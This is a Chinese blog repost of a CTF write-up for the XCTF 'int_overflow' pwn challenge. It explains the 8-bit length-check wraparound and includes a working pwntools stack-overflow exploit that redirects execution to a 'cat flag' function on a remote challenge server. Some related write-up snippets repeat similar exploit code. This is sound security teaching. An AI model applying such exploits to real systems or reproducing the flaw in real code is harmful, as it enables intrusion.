day-9 xctf-int_overflow

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量341 收藏
点赞数
文章标签: 人工智能
原文链接:http://www.cnblogs.com/yidianhan/p/11609619.html
版权

xctf-int_overflow

题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=undefined

checksec文件,No canary found,32位程序:

 

用ida打开查看:

判断输入,选择功能菜单:1、Login;2、Exit

 

 

 查看login()函数,先输入name,然后输入passwd,长度为0x199u

 

 再查看check_passwd()函数,

判断输入是否大于3小于等于8,成功则Success并strcpy到dest。

s长度为0x199u,也就是十进制的409,‭二进制:0001 1001 1001‬,远大于一个字,但是,储存他的长度为8bit的空间,

只能储存后八位,那么,超出的位置无法储存,存在溢出,那么3-8(0000 0011-0000 1000)也可以是259-264(0001 0000 0011-0001 0000 1000)

 

查看汇编代码,发现可以通过栈溢出的方式,retn我们自己想要返回的地址,leave指令- - - >mov esp,ebp ; pop ebp

 

选择一个256-264之间随便的数:263

那么  263-0x14-4-4 = 235

 

 

 查看字符串,寻找到系统调用cat flag地址:0x804868B:

 

可以构造exp:

from pwn import *

#cnn = process('./int_ovweflow')
cnn=remote('111.198.29.45',38032)

#libc = cdll.loadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

system_addr = 0x0804868B

payload = 'a'*0x14 + 'a'*4 + p32(system_addr) + 'a'*235

cnn.sendlineafter("choice:",'1')

cnn.sendlineafter("username:",'www')

cnn.sendlineafter("passwd:",payload)

cnn.interactive()
exp

 

得到flag:

 

 

总结:符号位是个很重要的东西!

 

转载于:https://www.cnblogs.com/yidianhan/p/11609619.html

a525024162806525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2619
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1444
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
int_overflow
weixin_45846085的博客
05-24 397
1.程序检查 下载附件,checksec一下检查文件保护 只打开了NX保护,栈不可以执行 运行一下程序选择,整个程序功能就是输入一个名字和密码 查看一下程序当中引用的字符串,我们发现了一个cat flag 2.流程分析 使用神器IDA ,查看程序整体逻辑。 在what_is_this函数中发现cat flag,我们的目标就是控制程序去执行,what_is_this这个函数。 这里程序的漏洞很明显strcpy是可以栈溢出的地方 这边我们就可以进行栈溢出。 但是这个程序有一个密码长度检查,那么
int_overflow(xctf)
weixin_43868725的博客
05-06 564
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 396
[攻防世界]int_overflow巨细
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF-HW-pipeline附件
最新发布
11-09
附件
PWN做题笔记2-int_overflow(已校对)
qq_40923256的博客
04-19 225
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1 如图,程序是一个32位ELF文件 chesec ida反编译,main方法中实现了登录功能,无溢出点 login方法中输入用户名和密码: 这里位数上0x19<40,0x199<512,因此无溢出 check_passwd实现对密码长度进行检查: 密...
xctf学习之intoverflow
neuisf的博客
01-11 507
此题题目为intoverflow,提示整数溢出,IDA阅读伪代码,发现Success条件是输入password长度为[3,8),而要程序中有个函数what_is_this,功能是cat flag,所以要想获取flag,需要让程序运行此函数,而程序的运行并没有调用此函数,因此,必须溢出。存储输入password长度的变量是短整型,即8位二进制数,范围[0,255],当值大于255时,发生溢出,如25...
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 939
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1840
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
int_overflow writeup
ditto的博客
01-06 916
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
攻防世界_pwn int_overflow(萌新版)
TedLau的博客
02-24 477
首发于鄙人博客:传送门 0x00 前言 重刷攻防世界,本人纯萌新,在本次刷题过程中,不能再想之前那样,做过就忘,我打算将我的思路尽可能的写成文章发在网站。 0x10 步骤 file与checksec步骤已省略 根据反汇编的意思,便可以知道buf的长度比dest的长度长,所以在strcpy的时候会发生溢出现象。 而如果我们的s的长度在3和8之间,那么我们便无法使得s...
xctf int_overflow
pondzhang的专栏
12-09 111
from pwn import * #p = process('./int_overflow') p = remote("220.249.52.133",54612) p.recvuntil('Your choice:') p.sendline('1') p.recvuntil('username:\n') p.sendline('1') p.recvuntil('passwd:\n') payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28) #gdb.
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 185
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
攻防世界新手区pwn writeup
极客剑寮
09-08 930
CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文件后,使用file命令查看。 32位的文件,用ida打开,F5查看伪代码。 printf漏洞:https://www.cnblogs.com/cfans1993/articles...
攻防世界-int_overflow
qq_45771413的博客
04-27 291
查看保护 IDA 先查看字符串搜索下有无可利用字符串,找到了cat flag。进入发现直接是system cat flag。看来只需要跳转到这个地址就可以了(0x8048694) 开始只能选择1.login登录,进入后提示输入用户名和密码。这里用户名限制死25位,没有操作空间,密码可以输入409位,插个眼。 最后还有个check passwd函数: 判断输入函数长度是否大于3小于8 然后将输入的密码拷贝给dest。 题目提示int_overstack,明晃晃地告诉我是整型溢出。我的关注重点就放在in
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值